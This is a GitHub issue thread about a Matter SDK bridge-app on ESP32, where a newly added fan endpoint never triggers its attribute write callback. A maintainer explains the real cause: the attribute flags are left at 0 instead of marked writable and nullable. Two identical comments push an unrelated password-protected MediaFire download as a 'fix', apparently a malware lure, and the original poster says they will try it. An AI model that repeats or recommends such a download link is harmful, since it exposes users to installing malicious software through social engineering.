### ISSUE TITLE
[1.2]After adding a fan to the bridge device, the write callback cannot be triggered.

### ISSUE THREAD

**Issue by WOLEN6914183** [project-chip/connectedhomeip#35211]
### Reproduction steps

1 Prerequisites 
     1.1. sdk matter-1.2-branch
     1.2. esp-idf 5.1
     1.3. bridge-app
2.Using the ZAP tool, add a fan device to Endpoint 3 in the bridge-app.zap as shown in the image below.
![image](https://github.com/user-attachments/assets/40f02020-b284-4a4b-ae7a-1d06864ade8d)
![image](https://github.com/user-attachments/assets/13654aa5-894b-4a24-bb3d-54cb034c1f27)

3. The fan code under the bridge-app example
    3.1 Fan atrribute declare 
  DECLARE_DYNAMIC_ATTRIBUTE_LIST_BEGIN(FanAttrs)
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::FanMode::Id, ENUM8,1,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::FanModeSequence::Id, ENUM8,1,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::PercentSetting::Id, PERCENT,2,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::PercentCurrent::Id, PERCENT,2,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::SpeedMax::Id, INT8U,1,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::SpeedSetting::Id, INT8U,1,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::SpeedCurrent::Id, INT8U,1,0), 
 DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::FeatureMap::Id, BITMAP32,4,0), 
   DECLARE_DYNAMIC_ATTRIBUTE_LIST_END();
   constexpr CommandId fanIncomingCommands[] = {
    app::Clusters::FanControl::Commands::Step::Id,
    kInvalidCommandId,
};
   3.2 Fan cluster declare

   DECLARE_DYNAMIC_CLUSTER_LIST_BEGIN(bridgedFanClusters)
   DECLARE_DYNAMIC_CLUSTER(FanControl::Id, FanAttrs, nullptr, nullptr),
    DECLARE_DYNAMIC_CLUSTER(Descriptor::Id, descriptorAttrs, nullptr, nullptr),
    DECLARE_DYNAMIC_CLUSTER(BridgedDeviceBasicInformation::Id, bridgedDeviceBasicAttrs, 
    nullptr,nullptr) DECLARE_DYNAMIC_CLUSTER_LIST_END;

   3.3 Fan Endpoint declare

     DECLARE_DYNAMIC_ENDPOINT(bridgedFanEndpoint, bridgedFanClusters);

   3.4 Fan Write and Read Handlde 
![image](https://github.com/user-attachments/assets/35e09063-0c4d-4337-be5c-360db284839f)

![image](https://github.com/user-attachments/assets/aeb6528e-00c9-44e1-b035-e3bc15c16d9a)
  
 4. Device add to Apple Home
   
![img_v3_02e5_321ea414-ff37-413c-93b6-7e2ac9bf6d3g](https://github.com/user-attachments/assets/c5f9904e-ff9b-4b38-b383-2772e63a00d1)

5. devoce Log not found emberAfExternalAttributeWriteCallback log
![image](https://github.com/user-attachments/assets/3b47f573-51b4-457d-8024-a90f02a88830)
When I control it, I can receive IM:WriteRequest information. According to the code, it should trigger the emberAfExternalAttributeWriteCallback callback. I have tried adding curtain equipment and switching the equipment on and off. There is no problem, but there is an error in the fan.

This question has been bothering me for a long time. Please help me answer it when you have time.Thank you！

### Bug prevalence

1-2 times week

### GitHub hash of the SDK that was being used

commit 13028cf6bf21f211215ed513e5e03d78b46418eb

### Platform

esp32

### Platform Version(s)

1.2

### Type

Platform Issue

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by WOLEN6914183** [comment]
Thank you, I will try it first. Can you provide a link to an issue with a similar problem to mine?

**Comment by bzbarsky-apple** [comment]
>  DECLARE_DYNAMIC_ATTRIBUTE(FanControl::Attributes::FanMode::Id, ENUM8,1,0),

That `0` at the end says "no attribute flags".  In particular, since it's not setting `ATTRIBUTE_MASK_WRITABLE` there, the attribute is not treated as writable.

You need to use `ATTRIBUTE_MASK_WRITABLE` instead of `0` as the last arg to the macro for attributes that should be writable.

**Comment by bzbarsky-apple** [comment]
Also, you would need PercentSetting to have ATTRIBUTE_MASK_NULLABLE, etc....

**Comment by bzbarsky-apple** [comment]
https://github.com/project-chip/connectedhomeip/pull/35228 to hopefully improve the documentation here.

**Comment by WOLEN6914183** [comment]
Thank you, my problem has been solved, mainly because I referred to the example of bridge-app so I didn't consider that the problem appeared here.
